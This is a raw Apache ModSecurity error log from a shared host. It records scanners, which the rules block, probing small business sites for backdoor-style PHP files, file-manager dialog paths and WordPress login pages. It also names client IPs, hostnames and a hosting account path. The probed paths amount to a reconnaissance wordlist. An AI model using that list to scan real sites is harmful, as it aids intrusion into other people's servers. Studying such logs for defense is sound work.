[Tue May 26 20:01:56.472885 2026] [security2:error] [pid 106517:tid 106667] [client 103.163.220.51:64113] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/backup.php"] [unique_id "ahWu3IZZc2DoU1lPnP11GgAAAJY"]
[Tue May 26 20:01:56.732989 2026] [security2:error] [pid 113091:tid 113282] [client 178.238.226.119:51279] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/old/filemanager/dialog.php"] [unique_id "ahWu3KPxBGSmlFNOy6pDhAAAAlE"]
[Tue May 26 20:01:56.984706 2026] [security2:error] [pid 113091:tid 113242] [client 103.163.220.16:60479] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/login.php"] [unique_id "ahWu3KPxBGSmlFNOy6pDhQAAAik"]
[Tue May 26 20:01:57.248038 2026] [security2:error] [pid 106517:tid 106730] [client 178.238.226.119:52378] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/plugins/filemanager/dialog.php"] [unique_id "ahWu3YZZc2DoU1lPnP11KAAAANQ"]
[Tue May 26 20:01:57.457686 2026] [security2:error] [pid 106517:tid 106776] [client 78.47.173.76:12322] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWu3YZZc2DoU1lPnP11LwAAAQI"], referer: http://ucdc.co.in/
[Tue May 26 20:01:57.479044 2026] [security2:error] [pid 106517:tid 106651] [client 103.163.220.53:33187] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/languages/themes/test.php"] [unique_id "ahWu3YZZc2DoU1lPnP11MAAAAIY"]
[Tue May 26 20:01:57.757873 2026] [security2:error] [pid 113091:tid 113219] [remote 132.148.72.88:54684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.72.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWu3aPxBGSmlFNOy6pDigACd38"], referer: https://canopykaapi.com/wp-login.php
[Tue May 26 20:01:57.776272 2026] [security2:error] [pid 106517:tid 106654] [client 178.238.226.119:53793] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/plugins/ckeditor/filemanager/dialog.php"] [unique_id "ahWu3YZZc2DoU1lPnP11OwAAAIk"]
[Tue May 26 20:01:57.793989 2026] [security2:error] [pid 106517:tid 106713] [client 192.42.116.118:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWu3YZZc2DoU1lPnP11MQAAw3g"], referer: https://kingsclub.in/banquets
[Tue May 26 20:01:57.989576 2026] [security2:error] [pid 112029:tid 112214] [client 103.163.220.41:55851] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/Text/system_core.php"] [unique_id "ahWu3aFW0C-ajaCsyFc_pAAAAUE"]
[Tue May 26 20:01:58.214592 2026] [security2:error] [pid 106517:tid 106728] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWu3YZZc2DoU1lPnP11OgAAANI"]
[Tue May 26 20:01:58.309231 2026] [security2:error] [pid 113091:tid 113325] [client 178.238.226.119:57047] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/plugins/ckeditor/plugins/filemanager/dialog.php"] [unique_id "ahWu3qPxBGSmlFNOy6pDlgAAAnw"]
[Tue May 26 20:01:58.481486 2026] [security2:error] [pid 106517:tid 106749] [client 103.163.220.33:31577] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/maintenance.php"] [unique_id "ahWu3oZZc2DoU1lPnP11RQAAAOc"]
[Tue May 26 20:01:58.655320 2026] [security2:error] [pid 112029:tid 112063] [remote 49.12.3.147:34064] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWu3qFW0C-ajaCsyFc_qgABNSE"]
[Tue May 26 20:01:58.827695 2026] [security2:error] [pid 106517:tid 106657] [client 178.238.226.119:59384] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/panel/filemanager/dialog.php"] [unique_id "ahWu3oZZc2DoU1lPnP11UAAAAIw"]
[Tue May 26 20:01:58.970285 2026] [security2:error] [pid 106517:tid 106745] [client 103.163.220.40:36515] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/class-wp-http-client.php"] [unique_id "ahWu3oZZc2DoU1lPnP11WAAAAOM"]
[Tue May 26 20:01:59.408320 2026] [security2:error] [pid 106517:tid 106675] [client 178.238.226.119:60888] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/tinymce/filemanager/dialog.php"] [unique_id "ahWu34ZZc2DoU1lPnP11eAAAAJ4"]
[Tue May 26 20:01:59.465277 2026] [security2:error] [pid 113091:tid 113273] [client 103.163.220.10:36997] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/666.php"] [unique_id "ahWu36PxBGSmlFNOy6pDuwAAAkg"]
[Tue May 26 20:01:59.959087 2026] [security2:error] [pid 106517:tid 106684] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWu34ZZc2DoU1lPnP11fQAAAKY"]
[Tue May 26 20:01:59.965791 2026] [security2:error] [pid 106517:tid 106692] [client 103.163.220.41:20463] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/nic.php"] [unique_id "ahWu34ZZc2DoU1lPnP11jgAAAK4"]
[Tue May 26 20:02:00.084912 2026] [security2:error] [pid 106517:tid 106702] [client 178.238.226.119:62481] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/tinymce/plugins/filemanager/dialog.php"] [unique_id "ahWu4IZZc2DoU1lPnP11kQAAALg"]
[Tue May 26 20:02:00.468252 2026] [security2:error] [pid 106517:tid 106674] [client 103.163.220.23:30771] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/Molla1.5.6/wp-content/users.php"] [unique_id "ahWu4IZZc2DoU1lPnP11qQAAAJ0"]
[Tue May 26 20:02:00.667842 2026] [security2:error] [pid 106517:tid 106682] [client 178.238.226.119:63772] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/tiny_mce/filemanager/dialog.php"] [unique_id "ahWu4IZZc2DoU1lPnP11rQAAAKQ"]
[Tue May 26 20:02:01.077894 2026] [security2:error] [pid 106517:tid 106651] [client 103.163.220.11:61797] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/p-includes/admin.php"] [unique_id "ahWu4YZZc2DoU1lPnP11vAAAAIY"]
[Tue May 26 20:02:01.404026 2026] [security2:error] [pid 112029:tid 112270] [client 178.238.226.119:49343] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/tiny_mce/plugins/filemanager/dialog.php"] [unique_id "ahWu4aFW0C-ajaCsyFc_ygAAAXk"]
[Tue May 26 20:02:01.562915 2026] [security2:error] [pid 106517:tid 106672] [client 103.163.220.53:55467] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/mmenu.php"] [unique_id "ahWu4YZZc2DoU1lPnP11zwAAAJs"]
[Tue May 26 20:02:01.986590 2026] [security2:error] [pid 113091:tid 113343] [client 178.238.226.119:50395] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/admin/tinymce/plugins/filemanager/dialog.php"] [unique_id "ahWu4aPxBGSmlFNOy6pD6wAAAo4"]
[Tue May 26 20:02:02.211539 2026] [security2:error] [pid 113091:tid 113305] [client 103.163.220.37:41149] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/theme-compat/chosen.php"] [unique_id "ahWu4qPxBGSmlFNOy6pD8AAAAmg"]
[Tue May 26 20:02:02.540602 2026] [security2:error] [pid 112029:tid 112226] [client 178.238.226.119:51548] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/script/filemanager/dialog.php"] [unique_id "ahWu4qFW0C-ajaCsyFc_2wAAAU0"]
[Tue May 26 20:02:02.639617 2026] [security2:error] [pid 112029:tid 112283] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWu4qFW0C-ajaCsyFc_1gAAAYY"]
[Tue May 26 20:02:02.766995 2026] [security2:error] [pid 106517:tid 106706] [client 103.163.220.24:34569] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/uploads/elementor/classwithtostring.php"] [unique_id "ahWu4oZZc2DoU1lPnP114QAAALw"]
[Tue May 26 20:02:03.110773 2026] [security2:error] [pid 113091:tid 113287] [client 178.238.226.119:52472] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/script/js/filemanager/dialog.php"] [unique_id "ahWu46PxBGSmlFNOy6pEBAAAAlY"]
[Tue May 26 20:02:03.262440 2026] [security2:error] [pid 106517:tid 106724] [client 103.163.220.30:44005] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/uploads/elementor/google-fonts/fonts/"] [unique_id "ahWu44ZZc2DoU1lPnP115gAAAM4"]
[Tue May 26 20:02:03.658692 2026] [security2:error] [pid 106517:tid 106701] [client 178.238.226.119:53483] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/scripts/filemanager/dialog.php"] [unique_id "ahWu44ZZc2DoU1lPnP118QAAALc"]
[Tue May 26 20:02:03.760102 2026] [security2:error] [pid 112029:tid 112183] [client 103.163.220.52:48897] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/contact-form-7/base-theme.php"] [unique_id "ahWu46FW0C-ajaCsyFc_4wAAASI"]
[Tue May 26 20:02:04.268082 2026] [security2:error] [pid 106517:tid 106718] [client 103.163.220.29:59601] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/heading/"] [unique_id "ahWu5IZZc2DoU1lPnP119AAAAMg"]
[Tue May 26 20:02:04.325542 2026] [security2:error] [pid 112029:tid 112166] [client 178.238.226.119:54481] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/scripts/ckeditor/filemanager/dialog.php"] [unique_id "ahWu5KFW0C-ajaCsyFc_8QAAARE"]
[Tue May 26 20:02:04.764492 2026] [security2:error] [pid 113091:tid 113347] [client 103.163.220.7:46693] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/geck.php"] [unique_id "ahWu5KPxBGSmlFNOy6pEKgAAApI"]
[Tue May 26 20:02:04.868822 2026] [security2:error] [pid 106517:tid 106676] [client 178.238.226.119:55216] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/third_party/filemanager/dialog.php"] [unique_id "ahWu5IZZc2DoU1lPnP12BwAAAJ8"]
[Tue May 26 20:02:05.059769 2026] [security2:error] [pid 106517:tid 106666] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWu5IZZc2DoU1lPnP12AQAAAJU"]
[Tue May 26 20:02:05.264302 2026] [security2:error] [pid 113091:tid 113289] [client 103.163.220.22:35603] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/wf-logs.php"] [unique_id "ahWu5aPxBGSmlFNOy6pEMgAAAlg"]
[Tue May 26 20:02:05.884487 2026] [security2:error] [pid 113091:tid 113300] [client 103.163.220.22:32215] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/l10n/wp-conflg.php"] [unique_id "ahWu5aPxBGSmlFNOy6pESwAAAmM"]
[Tue May 26 20:02:06.479320 2026] [security2:error] [pid 106517:tid 106775] [client 103.163.220.54:53871] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/home.php"] [unique_id "ahWu5oZZc2DoU1lPnP12MwAAAQE"]
[Tue May 26 20:02:06.973741 2026] [security2:error] [pid 106517:tid 106706] [client 202.76.128.231:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWu5oZZc2DoU1lPnP12NQAAALw"]
[Tue May 26 20:02:07.062388 2026] [security2:error] [pid 106517:tid 106688] [client 103.163.220.55:26135] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/cgi-bin/cgi-bin/cgi-bin/upload.php"] [unique_id "ahWu54ZZc2DoU1lPnP12SgAAAKo"]
[Tue May 26 20:02:07.501556 2026] [security2:error] [pid 106517:tid 106771] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWu54ZZc2DoU1lPnP12SQAAAP0"]
[Tue May 26 20:02:07.560781 2026] [security2:error] [pid 106517:tid 106761] [client 103.163.220.6:41229] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/cgi-bin/cgi-bin/panel.php"] [unique_id "ahWu54ZZc2DoU1lPnP12WgAAAPM"]
[Tue May 26 20:02:08.429899 2026] [security2:error] [pid 112029:tid 112212] [client 103.163.220.41:58907] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/js/tinymce/skins/lightgray/img/wp-login.php"] [unique_id "ahWu6KFW0C-ajaCsyFdACgAAAT8"]
[Tue May 26 20:02:08.975848 2026] [security2:error] [pid 106517:tid 106682] [client 85.208.96.206:39822] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/4/"] [unique_id "ahWu6IZZc2DoU1lPnP12eQAAAKQ"]
[Tue May 26 20:02:08.976025 2026] [security2:error] [pid 106517:tid 106682] [client 85.208.96.206:39822] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/4/"] [unique_id "ahWu6IZZc2DoU1lPnP12eQAAAKQ"]
[Tue May 26 20:02:09.253866 2026] [security2:error] [pid 112029:tid 112273] [client 103.163.220.29:21953] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/comment-date/wp-login.php"] [unique_id "ahWu6KFW0C-ajaCsyFdAHQAAAXw"]
[Tue May 26 20:02:10.045087 2026] [security2:error] [pid 113091:tid 113255] [client 103.163.220.19:47937] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/twentytwentytwo/templates/wp-login.php"] [unique_id "ahWu6aPxBGSmlFNOy6pElAAAAjY"]
[Tue May 26 20:02:10.335932 2026] [security2:error] [pid 112029:tid 112268] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWu6aFW0C-ajaCsyFdAMwAAAXc"]
[Tue May 26 20:02:10.540568 2026] [security2:error] [pid 106517:tid 106652] [client 103.163.220.14:52085] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/js/tinymce/skins/lightgray/img/about.php"] [unique_id "ahWu6oZZc2DoU1lPnP12nAAAAIc"]
[Tue May 26 20:02:11.334872 2026] [security2:error] [pid 113091:tid 113229] [client 103.163.220.20:52815] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/sodium_compat/wp-login.php"] [unique_id "ahWu66PxBGSmlFNOy6pErQAAAhw"]
[Tue May 26 20:02:11.505476 2026] [security2:error] [pid 113091:tid 113343] [client 43.173.175.102:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWu66PxBGSmlFNOy6pEuAAAAo4"]
[Tue May 26 20:02:12.156402 2026] [security2:error] [pid 112029:tid 112187] [client 103.163.220.10:22117] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/query-pagination-previous/wp-login.php"] [unique_id "ahWu66FW0C-ajaCsyFdAWAAAASY"]
[Tue May 26 20:02:12.725459 2026] [security2:error] [pid 113091:tid 113346] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWu7KPxBGSmlFNOy6pE0QAAApE"]
[Tue May 26 20:02:13.046501 2026] [security2:error] [pid 113091:tid 113234] [client 103.163.220.14:64665] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/rss/wp-login.php"] [unique_id "ahWu7KPxBGSmlFNOy6pE5wAAAiE"]
[Tue May 26 20:02:13.560377 2026] [security2:error] [pid 106517:tid 106713] [client 103.163.220.8:35185] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/js/dist/script-modules/block-library/search/"] [unique_id "ahWu7YZZc2DoU1lPnP124wAAAMM"]
[Tue May 26 20:02:14.067211 2026] [security2:error] [pid 106517:tid 106719] [client 103.163.220.24:33829] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/twentytwentytwo/assets/"] [unique_id "ahWu7oZZc2DoU1lPnP126wAAAMk"]
[Tue May 26 20:02:14.069514 2026] [core:crit] [pid 112029:tid 112250] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
